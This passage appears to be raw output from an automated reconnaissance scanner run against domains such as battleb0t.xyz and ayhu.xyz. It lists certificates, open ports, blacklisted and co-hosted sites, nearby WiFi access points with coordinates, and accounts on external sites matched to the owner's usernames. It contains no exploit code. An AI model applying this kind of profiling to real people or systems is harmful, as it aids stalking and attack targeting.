Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
| ayhu.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F0:8C:65) | 37.7642, -122.3993 |
| 2023-05-12 02:44:14 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz:443 | pics.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F0:49:B4) | 34.0544, -118.244 |
| 2023-05-12 03:10:24 | Blacklisted IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.97.1 | 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Poshmark (Category: shopping)
https://poshmark.com/closet/login | login |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:54:B0) | 41.8781, -87.6298 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs-guest (Net ID: 00:06:B1:28:66:5F) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wavelan network (Net ID: 00:02:2D:0E:29:C9) | 34.0544, -118.244 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/ein_1.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:00:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.11): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | XVIDEOS-profiles (Category: XXXPORNXXX)
https://www.xvideos.com/profiles/login | login |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:8443 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0C:41:D7:22:4A) | 39.0469, -77.4903 |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | rathook.cc | rathook.cc |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:00:94:CB:58:1E) | 41.8781, -87.6298 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | dilara (Net ID: 00:12:BF:56:97:E9) | 40.2024, 29.0398 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Wikipedia (Category: news)
https://en.wikipedia.org/wiki/User:Altpapier | Altpapier |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:443 | 188.114.96.1 |
| 2023-05-12 03:41:52 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 44486 | 45.131.109.53 |
| 2023-05-12 03:00:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.20): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000magda0000.github.io]
https://www.openphish.com/feed.txt | 0000magda0000.github.io |
| 2023-05-12 02:46:04 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Google LLC', u'organization_name': u'Google LLC', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:03'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'34.74.170.74', u'continent': u'North America', u'region_iso_code': u'SC'} | 34.74.170.74 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:07:40:61:40:4D) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:45:47 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8001::153 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Tenor (Category: images)
https://tenor.com/users/ayhu | ayhu |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Hangar6 (Net ID: 00:02:6F:E9:36:AC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=90 @ 66, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 112, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 54, 'Image XResolution': (0x011A) Ratio=72 @ 74, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 124, 'Image YResolution': (0x011B) Ratio=72 @ 82, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 136, 'EXIF ExifImageLength': (0xA003) Long=3088 @ 160, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 100, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 42, 'EXIF ExifImageWidth': (0xA002) Long=2316 @ 148, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 172} | https://funny.battleb0t.xyz/images/carti_3.JPG |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | opensource (Category: tech)
https://opensource.com/users/login | login |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.109.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6565 7241 (Net ID: 00:00:C5:D7:5E:64) | 41.8781, -87.6298 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.156): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:05:13:41) | 50.1188, 8.6843 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ^E^W^B^H^Y^B^I^L^G^R^_^W^H^S^^ (Net ID: 00:02:2D:6D:79:1B) | 37.7642, -122.3993 |
| 2023-05-12 02:47:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.148.97.127:443 | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:43:34:F0) | 50.8897, 6.0563 |
| 2023-05-12 03:01:24 | Raw Data from RIRs | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://ayhu.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://ayhu.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:07:56:EF) | 52.3759, 4.8975 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-F7C2 (Net ID: 00:1D:D2:C6:F7:C0) | 32.8608, -79.9746 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Blogspot (Category: blog)
http://ayshoo.blogspot.com | ayshoo |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:45:34 | Email Gateway (DNS MX Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | route3.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | 00rz.com |
| 2023-05-12 02:54:00 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.0.0/20 | 104.21.6.166 |
| 2023-05-12 02:54:19 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:05:05) | 50.8897, 6.0563 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.219): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:48:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:9d:c5:27:de:ee:41:17:4e:89:34:e6:9d:87:79:d7:50:31
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:19:20 2022 GMT
Not After : Mar 27 01:19:19 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
76:7f:d6:14:76:9a:00:79:07:de:19:f4:d2:24:0d:10:47:8b:
ae:3f:f8:44:9a:f2:ec:c1:7b:c5:a8:3e:1b:21:6a:d3:13:ea:
fb:6d:d3:d4:7a:d8:73:24:57:b7:c5:32:e7:93:1d:78:bc:d7:
ff:72:e3:d1:10:bf:79:59:e7:40:ad:5a:05:ec:c7:2b:28:99:
c1:ed:47:65:dd:b0:d9:8c:b9:fb:52:82:bf:aa:6b:d6:2b:5e:
26:b8:19:68:1f:cb:f7:83:5a:85:54:9b:67:dd:1c:c3:b5:19:
95:44:b2:10:39:c6:5d:ba:f4:dc:bd:f5:47:7d:2d:c3:7e:75:
c6:d5:af:d7:0f:c4:c8:38:03:fd:af:d2:65:d9:5e:49:76:fd:
fc:3f:85:65:96:12:92:30:76:19:b8:49:b0:4a:94:4c:bc:06:
3b:8d:29:dd:72:8b:b9:8f:94:30:a1:c6:0f:29:e6:44:ca:bb:
c4:7f:aa:99:ae:85:ab:60:ff:84:01:2b:19:b0:9f:0e:b2:bf:
6b:d8:54:fa:34:98:8f:4f:47:e3:d1:ce:6a:1c:59:12:82:39:
ad:8d:bb:d3:2e:49:4d:cc:e1:b9:78:44:ac:dd:a7:b9:87:43:
8d:e0:bd:42:23:b6:31:55:24:cd:a7:94:4c:30:87:24:49:6c:
3c:79:fe:30
| battleb0t.xyz |
| 2023-05-12 03:00:57 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.95): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:28 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | funny.battleb0t.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
